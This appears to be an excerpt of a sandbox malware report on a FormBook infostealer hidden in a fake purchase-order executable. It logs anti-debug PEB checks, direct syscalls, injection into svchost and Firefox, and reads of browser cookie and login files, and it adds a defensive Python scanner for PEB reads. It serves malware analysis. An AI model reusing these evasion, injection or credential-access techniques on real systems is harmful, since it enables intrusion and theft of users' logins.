            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h] (2 occurrences); mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002DA937 GetProcessHeap
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002D8E19 SetUnhandledExceptionFilter
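Every svchost.exe row above records a read of fs:[30h], the TEB slot that holds the PEB pointer in a 32-bit (WOW64) process. Code that fetches the PEB this often is normally about to test PEB.BeingDebugged (offset 0x02) or PEB.NtGlobalFlag (offset 0x68) inline instead of calling IsDebuggerPresent, which is why the sandbox groups these reads under its debugger-check signatures. The scanner below is an added example, not part of the Joe Sandbox report and not code from the sample: it finds both x86 encodings of that read in a raw code buffer and, for the eax form, names the debugger-flag test that follows it. The bytes it scans are a constructed snippet, not bytes dumped from this sample.

```python
import struct
from typing import List, Tuple

# x86 register names indexed by the ModRM 'reg' field.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
FS_PREFIX = 0x64        # segment-override prefix selecting FS
TEB_PEB_SLOT = 0x30     # TEB+0x30 holds the PEB pointer in a 32-bit process

# Instruction bytes that commonly follow 'mov eax, fs:[30h]' in inline anti-debug checks.
FOLLOW_ON = {
    bytes.fromhex("0FB64002"): "PEB.BeingDebugged (movzx eax, byte ptr [eax+2])",
    bytes.fromhex("80780200"): "PEB.BeingDebugged (cmp byte ptr [eax+2], 0)",
    bytes.fromhex("8B4068"):   "PEB.NtGlobalFlag (mov eax, [eax+68h])",
    bytes.fromhex("F6406870"): "PEB.NtGlobalFlag (test byte ptr [eax+68h], 70h)",
}


def find_peb_reads(code: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, disassembly, follow-on note) for every 'mov r32, fs:[30h]'.

    Two encodings cover what the report listed:
      64 A1 30 00 00 00      mov eax, fs:[30h]  (moffs32 short form, eax only)
      64 8B /r 30 00 00 00   mov r32, fs:[30h]  (ModRM mod=00 rm=101 -> disp32)
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != FS_PREFIX:
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1 \
                and struct.unpack_from("<I", code, i + 2)[0] == TEB_PEB_SLOT:
            hits.append((i, "mov eax, dword ptr fs:[00000030h]", _follow_on(code, i + 6)))
            i += 6
            continue
        if i + 7 <= n and code[i + 1] == 0x8B:
            modrm = code[i + 2]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 0 and rm == 5 \
                    and struct.unpack_from("<I", code, i + 3)[0] == TEB_PEB_SLOT:
                note = _follow_on(code, i + 7) if reg == 0 else ""
                hits.append((i, f"mov {REG32[reg]}, dword ptr fs:[00000030h]", note))
                i += 7
                continue
        i += 1
    return hits


def _follow_on(code: bytes, pos: int) -> str:
    """Name the PEB field tested by the instruction at pos, if it is a known check."""
    for pattern, label in FOLLOW_ON.items():
        if code.startswith(pattern, pos):
            return label
    return ""


# Constructed snippet (not bytes from the sample): prologue, BeingDebugged test,
# three register variants, a decoy read of fs:[18h] (TEB self pointer, not the PEB),
# and an NtGlobalFlag test after an eax read in the ModRM form.
SAMPLE_CODE = bytes.fromhex(
    "55 8BEC"                     # push ebp; mov ebp, esp
    "64A130000000" "0FB64002"     # mov eax, fs:[30h]; movzx eax, byte ptr [eax+2]
    "85C0 7502"                   # test eax, eax; jnz +2
    "64 8B15 30000000"            # mov edx, fs:[30h]
    "64 8B0D 30000000"            # mov ecx, fs:[30h]
    "64 8B35 30000000"            # mov esi, fs:[30h]
    "64A118000000"                # mov eax, fs:[18h]   (decoy)
    "64 8B05 30000000" "F6406870" # mov eax, fs:[30h]; test byte ptr [eax+68h], 70h
    "C3"                          # ret
)

if __name__ == "__main__":
    for off, text, note in find_peb_reads(SAMPLE_CODE):
        print(f"{off:04x}  {text:36s} {note}")
```

Run it over a dumped .text section (the unpacked 1.2.svchost.exe.350000.0 region listed later in this report is the natural input) rather than over the on-disk AutoIt stub: the reads live in the injected FormBook code, not in the dropper. A hit with an empty note still deserves a look, since the PEB is also the starting point for manual export resolution through PEB.Ldr (offset 0x0C).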

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread register set: target process: 7704
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread APC queued: target process: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 5D0008
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002EBE95 LogonUserW
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002F4B52 SendInput,keybd_event
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002F7DD5 mouse_event
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002D7254 cpuid
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002D40DA GetSystemTimeAsFileTime,__aulldiv
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_0032C146 GetUserNameW
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe Code function: 0_2_002CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match, file source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, file source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara match, file source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
